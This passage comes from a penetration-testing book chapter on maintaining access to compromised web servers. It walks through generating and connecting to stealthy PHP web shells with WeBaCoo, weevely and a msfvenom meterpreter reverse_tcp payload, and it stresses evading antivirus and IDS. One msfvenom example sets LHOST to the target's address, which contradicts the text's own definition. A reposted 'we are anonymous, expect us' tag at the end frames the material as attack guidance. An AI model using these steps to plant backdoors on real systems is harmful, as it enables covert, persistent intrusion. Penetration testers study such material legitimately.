backdoor

Creating web backdoors

In this section, we will discuss several tools that can be used to create a web 

backdoor. The tools in this category are usually used to maintain access to a 

compromised web server.

You need to be aware that the backdoors discussed here might be detected by IDS, 

antivirus, or other security tools. To be able to create a stealthy backdoor, you may 

customize the backdoors.

To illustrate the scenario in this section, we will use the following IP addresses:

• 192.168.2.22 is the IP address of the attacker machine.

• 192.168.2.23 is the IP address of the target server.

Let's start with the WeBaCoo backdoor.

WeBaCoo

WeBaCoo (Web Backdoor Cookie) is a web backdoor script tool used to provide a 

stealth terminal-like connection via HTTP between the client and web server.

WeBaCoo has two operation modes:

• Generation (Option –g): In this mode, users can generate the backdoor code 

containing PHP payloads

• Terminal (Option –t): In this mode, users can connect to the backdoor on the 

compromised server

The most interesting feature of WeBaCoo is that the communication between the web 

server and client is encoded in the HTTP header cookie, so it might not be detected 

by antivirus, network intrusion detection/prevention systems, network firewalls, 

and application firewalls.

The following are the three most important values in the HTTP cookie field:

• cm: The shell command encoded in Base64 

• cn: The new cookie name that the server will use to send the encoded output 

• cp: The delimiter used to wrap the encoded output

To start WeBaCoo, use the console to execute the following command:

# webacoo -h

This will display the command syntax on your screen. Let's see how to generate the 

backdoor first.

The following are the command-line options related with the generation mode:

No. Option Description

1 -g Generates backdoor code

2 -f function PHP system functions used in the backdoor are:

• system (default)

• shell_exec

• exec

• passthru

• popen

file

3 -o output The generated backdoor will be saved in the output 

To generate the obfuscated PHP backdoor using default settings and to save the 

result in the test.php file, you can use the following command:

# webacoo -g -o test.php

The result is as follows:

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit

 Copyright (C) 2011-2012 Anestis Bechtsoudis

 { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "test.php" created.

Maintaining Access

The following is the content of the test.php file:

Then, upload this file to the compromised server (192.168.2.23).

The next action is to connect to the backdoor using the following command:

# webacoo –t –u http://192.168.2.23/test.php

The following is the backdoor shell:

The following is the HTTP request as captured by a web proxy:

The following is the web server response:

From the preceding HTTP request and response screenshots, we notice that the 

communication between the backdoor and WeBaCoo is stealthy, so it might not be 

able to be detected by the victim.

To quit from the terminal mode, just type exit.

weevely

weevely is a stealth PHP web shell that provides an SSH-like console to execute 

system commands and automate administration and post-exploitation tasks.

The following are the main features of weevely (https://github.com/epinna/

Weevely):

• It has more than 30 modules to automate administration and post-

exploitation tasks such as:

° Execute commands and browse remote filesystems

° Check common server misconfiguration

° Spawn reverse and direct TCP shells

° Proxy HTTP traffic through target machines

° Run port scans from target machines

• Backdoor communications are hidden in the HTTP cookies

• It supports passwords to access the backdoor

To start weevely, use the console to execute the following command:

# weevely

This will display the command syntax on your screen.

weevely can be used to generate the following:

• Obfuscated PHP backdoor

• Backdoor existing image and create the related .htaccess

• Backdoored .htaccess

To display the list of generators and modules available, you can use the help option:

# weevely help

Maintaining Access

To generate the obfuscated PHP backdoor and save the result in the weevely.php

file, you can use the following command:

# weevely generate password display.php

[generate.php] Backdoor file 'display.php' created with password 

'password'

The following is the content of the display.php file:

Then, upload it to the target web server by using legitimate access or exploiting web 

application bugs.

To access the web backdoor shell on the target web server (192.168.2.23), you can 

use the following command:

# weevely http://192.168.2.23/display.php password

If successful, you will see the weevely shell. To verify that we have connected to the 

target machine, we issued the net.ifaces command to get the network interfaces 

information from the remote machine. We also used the id command to get the ID of 

the user. The output can be seen in the following screenshot:

From the preceding screenshot, we know that we have connected to the remote 

machine. You can then issue other commands to the remote machine. You can issue 

:help to see the available weevely commands:

For example, to run a simple port scan (using the :net.scan module) against the 

target web server on port 22, we give the following command:

msfadmin@:/var/www $ :net.scan 192.168.2.23 22

SCAN 192.168.2.23:22-22 OPEN: 192.168.2.23:22

To run a simple port scan (using the :net.scan module) on port 80, we give the 

following command:

msfadmin@:/var/www $ :net.scan 192.168.2.23 80

SCAN 192.168.2.23:80-80 OPEN: 192.168.2.23:80

To exit from the weevely shell, just press Ctrl + C.

The web shell created using the tools in this category is only for the PHP 

language. If you want to have a web shell for other languages, you can 

check Laudanum (http://laudanum.inguardians.com/). Laudanum 

provides functionality such as shell, DNS query, LDAP retrieval, and 

others. It supports the ASP, ASPX, CFM, JSP, and PHP languages.

Maintaining Access

PHP meterpreter

Metasploit has a PHP meterpreter payload. With this module, you can create a PHP 

webshell that has meterpreter capabilities. You can then upload the shell to the target 

server using vulnerabilities such as command injection and file upload.

To create the PHP meterpreter, we can utilize msfvenom from Metasploit using the 

following command:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.23 -f raw > php-

meter.php

The description of the command is as follows:

• -p: Payload (php/meterpreter/reverse_tcp)

• -f: Output format (raw)

• LHOST: The attacking machine IP address

The generated PHP meterpreter will be stored in the php-meter.php file. The 

following is a snippet of the php-meter.php file contents:

Before you send this backdoor to the target, you need to remove the comment mark 

in the first line, as shown with the arrow in the preceding screenshot.

You need to prepare how to handle the PHP meterpreter. In your machine, start 

Metasploit Console (msfconsole) and use the multi/handler exploit. Then, use the 

php/meterpreter/reverse_tcp payload, the same payload we used during the 

generation of the shell backdoor. Next, you need to set the LHOST variable with your 

machine IP address. After that, you use the exploit command to run the exploit 

handler. The result of the command is as follows:

After you store the shell in the target web server utilizing web vulnerabilities such 

as command injection, or execute the shell from your server exploiting remote file 

inclusion vulnerability, you can access the shell via a web browser.

In your machine, you will see the meterpreter session open:

After that, you can issue meterpreter commands such as sysinfo and getuid.

[ 363 ]

Maintaining Access

Summary

In this chapter, we discussed the operating system backdoors such as cymothoa, 

intersect, and metsvc, which can be used to maintain access on target machines. 

Next, we discussed protocol tunneling tools that can wrap one network protocol to 

another. The goal of this protocol tunneling is to bypass any mechanism enacted by 

the target machine to limit our capability to connect to the outside world. The tools 

in this category are dns2tcp, iodine, ncat, proxychains, ptunnel, socat, sslh, 

and stunnel4.

At the end of this chapter, we briefly described the web backdoor tools. These tools 

can be used to generate a webshell backdoor on the target machine, and we can then 

connect to this backdoor. 

In the next chapter, we will discuss documenting, reporting, and presenting the 

vulnerabilities found to the relevant parties.

 

thank you ;) 

 

we are anonymous 

expect us !